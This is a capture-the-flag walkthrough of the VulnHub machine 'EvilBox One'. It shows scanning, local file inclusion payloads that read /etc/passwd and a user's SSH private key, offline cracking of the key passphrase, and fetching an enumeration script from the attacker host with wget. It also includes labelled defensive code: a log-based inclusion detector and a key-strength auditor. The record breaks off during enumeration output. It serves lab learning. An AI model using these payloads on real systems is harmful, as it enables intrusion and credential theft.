EvilBox One
NMAP Scan
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.103 -oN nmap_full_scan
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-25 02:01 EDT
Nmap scan report for bogon (192.168.56.103)
Host is up (0.00030s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
| 256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_ 256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:3A:ED:42 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.19 seconds
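Information Gathering
The NMAP results show that the target host runs only two services, SSH and HTTP. This version of the SSH service has no exploitable vulnerability, so information gathering focuses on the HTTP service.
┌──(kali㉿kali)-[~/Vulnhub/evilbox]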
└─$ curl http://192.168.56.103/
The response is the default Apache page, and its source code contains nothing useful.
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ curl http://192.168.56.103/robots.txt
Hello H4x0r
Is H4x0r a username or a directory? That is not clear yet. Next, scan for other directories or files.
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ gobuster dir -u http://192.168.56.103 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.103
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/10/25 02:07:22 Starting gobuster in directory enumeration mode
===============================================================
/secret (Status: 301) [Size: 317] [--> http://192.168.56.103/secret/]
/server-status (Status: 403) [Size: 279]
===============================================================
2022/10/25 02:07:58 Finished
===============================================================
The gobuster scan of the target host found the /secret and /server-status directories.
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ curl http://192.168.56.103/secret
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.56.103/secret/">here</a>.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.103 Port 80</address>
</body></html>
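The /secret directory is interesting. Visiting it returns a blank page, so there are probably files of interest inside it. Continue scanning:
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ gobuster dir -u http://192.168.56.103/secret/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z -x .php,.txt,.html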
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.103/secret/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,html,php
[+] Timeout: 10s
===============================================================
2022/10/25 02:12:26 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 4]
/evil.php (Status: 200) [Size: 0]
The scan found evil.php. Visiting it returns a blank page, so the next step is to check whether it accepts any parameters.
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ wfuzz -c -u 'http://192.168.56.103/secret/evil.php?FUZZ=test' -w /usr/share/seclists/Discovery/Web-Content/big.txt --hh 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.103/secret/evil.php?FUZZ=test
Total requests: 20476
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
Total time: 22.99640
Processed Requests: 20476
Filtered Requests: 20476
Requests/sec.: 890.3999
No results. Change test to /etc/passwd and continue fuzzing.
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ wfuzz -c -u 'http://192.168.56.103/secret/evil.php?FUZZ=../../../../../../etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/big.txt --hh 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.103/secret/evil.php?FUZZ=../../../../../../etc/passwd
Total requests: 20476
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000004959: 200 26 L 38 W 1398 Ch "command"
Total time: 0
Processed Requests: 20476
Filtered Requests: 20475
Requests/sec.: 0
Surprise! The fuzzing reveals that the parameter name is command. Verify it:
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ curl http://192.168.56.103/secret/evil.php?command=../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
This gives the username mowree.
Next, use a php filter to obtain the source code of evil.php.
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ curl http://192.168.56.103/secret/evil.php?command=php://filter/convert.base64-encode/resource=evil.php
PD9waHAKICAgICRmaWxlbmFtZSA9ICRfR0VUWydjb21tYW5kJ107CiAgICBpbmNsdWRlKCRmaWxlbmFtZSk7Cj8+Cg==
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ echo "PD9waHAKICAgICRmaWxlbmFtZSA9ICRfR0VUWydjb21tYW5kJ107CiAgICBpbmNsdWRlKCRmaWxlbmFtZSk7Cj8+Cg==" | base64 -d
<?php
$filename = $_GET['command'];
include($filename);
?>
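From the defender's side, the requests made against evil.php above leave a clear trace in the web server's access log. The following is an added example, not part of the original write-up: a small detector that flags path traversal, PHP stream wrappers and sensitive file targets in query parameters. The log lines, timestamps and user agents are constructed, and the rule names are hypothetical.

```python
import re
from dataclasses import dataclass
from urllib.parse import parse_qsl, unquote

# Constructed Apache "combined" log lines modelled on the requests in this walkthrough.
SAMPLE_LOG = """\
192.168.56.101 - - [25/Oct/2022:08:20:01 +0200] "GET /secret/evil.php?command=../../../../../../etc/passwd HTTP/1.1" 200 1398 "-" "curl/7.85.0"
192.168.56.101 - - [25/Oct/2022:08:21:10 +0200] "GET /secret/evil.php?command=php://filter/convert.base64-encode/resource=evil.php HTTP/1.1" 200 92 "-" "curl/7.85.0"
192.168.56.101 - - [25/Oct/2022:08:22:30 +0200] "GET /secret/evil.php?command=%2e%2e%2f%2e%2e%2fhome%2fmowree%2f.ssh%2fid_rsa HTTP/1.1" 200 1743 "-" "curl/7.85.0"
192.168.56.101 - - [25/Oct/2022:08:23:00 +0200] "GET /secret/index.html HTTP/1.1" 200 4 "-" "Mozilla/5.0"
192.168.56.101 - - [25/Oct/2022:08:23:05 +0200] "GET /search.php?q=apache+default+page HTTP/1.1" 404 279 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Rules are evaluated in this order against the decoded parameter value.
RULES = [
    ("path-traversal", re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")),
    ("stream-wrapper", re.compile(r"^(?:php|file|data|expect|zip|phar|glob)://", re.I)),
    ("sensitive-file", re.compile(r"/etc/(?:passwd|shadow)\b|/\.ssh/|\bid_(?:rsa|ecdsa|ed25519)\b")),
]


@dataclass
class Finding:
    client: str
    time: str
    path: str
    param: str
    value: str
    reasons: list
    served: bool  # True when the server answered 200 with a non-empty body


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded sequences are normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan(log_text: str) -> list:
    """Return one Finding per suspicious query parameter in the log text."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        # Apache logs the raw request target, so encoding is still intact here.
        path, _, query = m["target"].partition("?")
        size = 0 if m["size"] == "-" else int(m["size"])
        for param, raw in parse_qsl(query, keep_blank_values=True):
            value = fully_decode(raw)
            reasons = [name for name, rx in RULES if rx.search(value)]
            if reasons:
                findings.append(Finding(
                    m["client"], m["time"], path, param, value, reasons,
                    served=(m["status"] == "200" and size > 0),
                ))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        flag = "CONTENT RETURNED" if f.served else "no content"
        print(f"{f.time} {f.client} {f.path} {f.param}={f.value} {f.reasons} [{flag}]")
```

A hit with a 200 status and a non-empty body deserves priority, because it means the include returned file content to the client.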
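With the username known, check whether the LFI (local file inclusion) vulnerability can be used to read this user's private key; if the key exists, download it to the attacking machine.
┌──(kali㉿kali)-[~/Vulnhub/evilbox]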
└─$ curl http://192.168.56.103/secret/evil.php?command=../../../../../../home/mowree/.ssh/id_rsa > id_rsa
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 100 1743 100 1743 0 0 275k 0 --:--:-- --:--:-- --:--:-- 283k
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ ls
id_rsa nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
[...]
-----END RSA PRIVATE KEY-----
The user's private key file has been obtained.
Gaining User Access
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ ssh -i id_rsa mowree@192.168.56.103
The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established.
ED25519 key fingerprint is SHA256:0x3tf1iiGyqlMEM47ZSWSJ4hLBu7FeVaeaT2FxM7iq8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.103' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
The private key file is protected by a passphrase, which has to be cracked with John.
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ ssh2john id_rsa > hashes
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ john hashes --wordlist /usr/share/wordlists/rockyou.txt
Warning: only loading hashes of type "SSH", but also saw type "tripcode"
Use the "--format=tripcode" option to force loading hashes of that type instead
Warning: only loading hashes of type "SSH", but also saw type "descrypt"
Use the "--format=descrypt" option to force loading hashes of that type instead
Warning: only loading hashes of type "SSH", but also saw type "pix-md5"
Use the "--format=plaintext" option to force loading hashes of that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with wordlist:/usr/share/john/password.lst
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn (id_rsa)
1g 0:00:00:00 DONE (2022-10-25 02:40) 33.33g/s 23466p/s 23466c/s 23466C/s surfer..unicorn
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
The passphrase of the private key file has been cracked: unicorn
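The quick crack follows from the key's format: the Proc-Type and DEK-Info headers mark the legacy PEM encryption, which derives the key from the passphrase with MD5 at an iteration count of 1, matching the "MD5/3DES" cost John reports. The following is an added example, not part of the original write-up: an audit helper that classifies a private key file by its passphrase protection. The function names, verdict labels and sample bodies are constructed for illustration; only the two PEM headers come from the page.

```python
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"
MIN_ROUNDS = 16  # ssh-keygen's default bcrypt round count
LEGACY_BEGIN = {f"-----BEGIN {t} PRIVATE KEY-----" for t in ("RSA", "DSA", "EC")}

# Constructed sample: the headers are those shown in id_rsa above;
# the body is a placeholder, not key material.
LEGACY_SAMPLE = """\
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E

Q09OU1RSVUNURUQ=
-----END RSA PRIVATE KEY-----
"""


def _pack(data: bytes) -> bytes:
    """Encode an SSH wire-format string: uint32 length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def _read(buf: bytes, off: int):
    """Decode an SSH wire-format string at off; return (bytes, next offset)."""
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n


def build_openssh_sample(rounds: int) -> str:
    """Constructed header-only blob in the openssh-key-v1 layout (no key material)."""
    kdfopts = _pack(b"\x00" * 16) + struct.pack(">I", rounds)  # salt, rounds
    blob = OPENSSH_MAGIC + _pack(b"aes256-ctr") + _pack(b"bcrypt") + _pack(kdfopts)
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
            + base64.b64encode(blob).decode() + "\n"
            + "-----END OPENSSH PRIVATE KEY-----\n")


def classify_private_key(text: str) -> dict:
    """Report format, cipher, KDF and a verdict for one private key file."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    result = {"format": "unknown", "encrypted": False, "cipher": None,
              "kdf": None, "rounds": None, "verdict": "unknown"}
    if not lines:
        return result

    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        cipher, off = _read(blob, len(OPENSSH_MAGIC))
        kdf, off = _read(blob, off)
        kdfopts, off = _read(blob, off)
        result.update(format="openssh-key-v1", cipher=cipher.decode(), kdf=kdf.decode())
        if cipher == b"none":
            result["verdict"] = "unprotected"
            return result
        result["encrypted"] = True
        if kdf == b"bcrypt":
            _salt, pos = _read(kdfopts, 0)
            result["rounds"] = struct.unpack_from(">I", kdfopts, pos)[0]
            result["verdict"] = "ok" if result["rounds"] >= MIN_ROUNDS else "low-rounds"
        return result

    if lines[0] in LEGACY_BEGIN:
        headers = {}
        for ln in lines[1:]:
            if ":" not in ln:  # blank line or base64 body ends the header block
                break
            key, value = ln.split(":", 1)
            headers[key.strip()] = value.strip()
        result["format"] = "legacy-pem"
        if headers.get("Proc-Type") == "4,ENCRYPTED":
            # Legacy PEM: MD5-based EVP_BytesToKey, iteration count 1.
            result.update(encrypted=True, kdf="md5-evp-bytestokey", rounds=1,
                          cipher=headers.get("DEK-Info", "").split(",")[0],
                          verdict="weak")
        else:
            result["verdict"] = "unprotected"
    return result


if __name__ == "__main__":
    print(classify_private_key(LEGACY_SAMPLE))
    print(classify_private_key(build_openssh_sample(16)))
```

Keys reported as weak can be rewritten in the OpenSSH format with a bcrypt KDF on OpenSSH 7.8 or later, for example with `ssh-keygen -p -a <rounds> -f <keyfile>`.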
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ ssh -i id_rsa mowree@192.168.56.103
Enter passphrase for key 'id_rsa':
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
Privilege Escalation
Upload the linenum.sh script to the target host and run it.
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ cp ~/Tools/linenum/LinEnum.sh .
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ ls
hashes id_rsa LinEnum.sh nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ mv LinEnum.sh shell.sh
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
mowree@EvilBoxOne:/tmp$ wget http://192.168.56.101:8000/shell.sh
--2022-10-25 08:46:26-- http://192.168.56.101:8000/shell.sh
Conectando con 192.168.56.101:8000... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 46631 (46K) [text/x-sh]
Grabando a: “shell.sh”
shell.sh 100%[================>] 45,54K --.-KB/s en 0s
2022-10-25 08:46:26 (229 MB/s) - “shell.sh” guardado [46631/46631]
mowree@EvilBoxOne:/tmp$ chmod +x shell.sh
mowree@EvilBoxOne:/tmp$ ./shell.sh
#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982
[-] Debug Info
[+] Thorough tests = Disabled
Scan started at:
mar oct 25 08:46:37 CEST 2022
### SYSTEM ##############################################
[-] Kernel information:
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
[-] Kernel information (continued):
Linux version 4.19.0-17-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.194-3 (2021-07-18)
[-] Specific release information:
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
[-] Hostname:
EvilBoxOne
### USER/GROUP ##########################################
[-] Current user/group info:
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
[-] Users that have previously logged onto the system:
Nombre Puerto De Último
root tty1 lun ago 16 13:12:28 +0200 2021
daemon **Nunca ha accedido**
bin **Nunca ha accedido**
sys **Nunca ha accedido**
sync **Nunca ha accedido**
games **Nunca ha accedido**
man **Nunca ha accedido**
lp **Nunca ha accedido**
mail **Nunca ha accedido**
news **Nunca ha accedido**
uucp **Nunca ha accedido**
proxy **Nunca ha accedido**
www-data **Nunca ha accedido**
backup **Nunca ha accedido**
list **Nunca ha accedido**
irc **Nunca ha accedido**
gnats **Nunca ha accedido**
nobody **Nunca ha accedido**
_apt **Nunca ha accedido**
systemd-timesync **Nunca ha accedido**
systemd-network **Nunca ha accedido**
systemd-resolve **Nunca ha accedido**
messagebus **Nunca ha accedido**
sshd **Nunca ha accedido**
mowree pts/0 192.168.56.101 mar oct 25 08:42:13 +0200 2022
systemd-coredump **Nunca ha accedido**
[-] Who else is logged on:
08:46:37 up 47 min, 1 user, load average: 0,00, 0,00, 0,15
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
mowree pts/0 192.168.56.101 08:42 4.00s 0.05s 0.00s /bin/bash ./shell.sh
[-] Group memberships:
uid=0(root) gid=0(root) grupos=0(root)
uid=1(daemon) gid=1(daemon) grupos=1(daemon)
uid=2(bin) gid=2(bin) grupos=2(bin)
uid=3(sys) gid=3(sys) grupos=3(sys)
uid=4(sync) gid=65534(nogroup) grupos=65534(nogroup)
uid=5(games) gid=60(games) grupos=60(games)
uid=6(man) gid=12(man) grupos=12(man)
uid=7(lp) gid=7(lp) grupos=7(lp)
uid=8(mail) gid=8(mail) grupos=8(mail)
uid=9(news) gid=9(news) grupos=9(news)
uid=10(uucp) gid=10(uucp) grupos=10(uucp)
uid=13(proxy) gid=13(proxy) grupos=13(proxy)
uid=33(www-data) gid=33(www-data) grupos=33(www-data)
uid=34(backup) gid=34(backup) grupos=34(backup)
uid=38(list) gid=38(list) grupos=38(list)
uid=39(irc) gid=39(irc) grupos=39(irc)
uid=41(gnats) gid=41(gnats) grupos=41(gnats)
uid=65534(nobody) gid=65534(nogroup) grupos=65534(nogroup)
uid=100(_apt) gid=65534(nogroup) grupos=65534(nogroup)
uid=101(systemd-timesync) gid=102(systemd-timesync) grupos=102(systemd-timesync)
uid=102(systemd-network) gid=103(systemd-network) grupos=103(systemd-network)
uid=103(systemd-resolve) gid=104(systemd-resolve) grupos=104(systemd-resolve)
uid=104(messagebus) gid=110(messagebus) grupos=110(messagebus)
uid=105(sshd) gid=65534(nogroup) grupos=65534(nogroup)
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
uid=999(systemd-coredump) gid=999(systemd-coredump) grupos=999(systemd-coredump)
[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
[-] Super user account(s):
root
[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x 3 root root 4,0K ago 16 2021 .
drwxr-xr-x 18 root root 4,0K ago 16 2021 ..
drwxr-xr-x 4 mowree mowree 4,0K ago 16 2021 mowree
### ENVIRONMENTAL #######################################
[-] Environment information:
SHELL=/bin/bash
PWD=/tmp
LOGNAME=mowree
XDG_SESSION_TYPE=tty
HOME=/home/mowree
LANG=es_ES.UTF-8
SSH_CONNECTION=192.168.56.101 51542 192.168.56.103 22
XDG_SESSION_CLASS=user
TERM=xterm-256color
USER=mowree
SHLVL=1
XDG_SESSION_ID=4
XDG_RUNTIME_DIR=/run/user/1000
SSH_CLIENT=192.168.56.101 51542 22
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
MAIL=/var/mail/mowree
SSH_TTY=/dev/pts/0
OLDPWD=/home/mowree
_=/usr/bin/env
[-] Path information:
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
lrwxrwxrwx 1 root root 7 ago 16 2021 /bin -> usr/bin
drwxr-xr-x 2 root root 20480 ago 16 2021 /usr/bin
drwxr-xr-x 2 root root 4096 ene 30 2021 /usr/games
drwxr-xr-x 2 root root 4096 ago 16 2021 /usr/local/bin
drwxr-xr-x 2 root root 4096 ago 16 2021 /usr/local/games
[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/bash
/usr/bin/bash
/bin/rbash
/usr/bin/rbash
/bin/dash
/usr/bin/dash
[-] Current umask value:
0022
u=rwx,g=rx,o=rx
[-] umask value as specified in /etc/login.defs:
UMASK 022
[-] Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512
### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root 1042 oct 11 2019 /etc/crontab
/etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 ago 16 2021 .
drwxr-xr-x 71 root root 4096 ago 16 2021 ..
-rw-r--r-- 1 root root 712 dic 17 2018 php
-rw-r--r-- 1 root root 102 oct 11 2019 .placeholder
/etc/cron.daily:
total 40
drwxr-xr-x 2 root root 4096 ago 16 2021 .
drwxr-xr-x 71 root root 4096 ago 16 2021 ..
-rwxr-xr-x 1 root root 539 ago 8 2020 apache2
-rwxr-xr-x 1 root root 1478 dic 7 2020 apt-compat
-rwxr-xr-x 1 root root 355 dic 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 1187 abr 19 2019 dpkg
-rwxr-xr-x 1 root root 377 ago 29 2018 logrotate
-rwxr-xr-x 1 root root 1123 feb 10 2019 man-db
-rwxr-xr-x 1 root root 249 sep 27 2017 passwd
-rw-r--r-- 1 root root 102 oct 11 2019 .placeholder
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 ago 16 2021 .
drwxr-xr-x 71 root root 4096 ago 16 2021 ..
-rw-r--r-- 1 root root 102 oct 11 2019 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 ago 16 2021 .
drwxr-xr-x 71 root root 4096 ago 16 2021 ..
-rw-r--r-- 1 root root 102 oct 11 2019 .placeholder
/etc/cron.weekly:
total 16
drwxr-xr-x 2 root root 4096 ago 16 2021 .
drwxr-xr-x 71 root root 4096 ago 16 2021 ..
-rwxr-xr-x 1 root root 813 feb 10 2019 man-db
-rw-r--r-- 1 root root 102 oct 11 2019 .placeholder
[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
[-] Systemd timers:
NEXT LEFT LAST PASSED UNIT ACTIVATES
Tue 2022-10-25 09:09:00 CEST 22min left Tue 2022-10-25 08:39:04 CEST 7min ago phpsessionclean.timer phpsessionclean.service
Wed 2022-10-26 00:00:00 CEST 15h left Tue 2022-10-25 07:59:22 CEST 47min ago logrotate.timer logrotate.service
Wed 2022-10-26 00:00:00 CEST 15h left Tue 2022-10-25 07:59:22 CEST 47min ago man-db.timer man-db.service
Wed 2022-10-26 03:39:18 CEST 18h left Tue 2022-10-25 07:59:22 CEST 47min ago apt-daily.timer apt-daily.service
Wed 2022-10-26 06:16:21 CEST 21h left Tue 2022-10-25 07:59:22 CEST 47min ago apt-daily-upgrade.timer apt-daily-upgrade.service
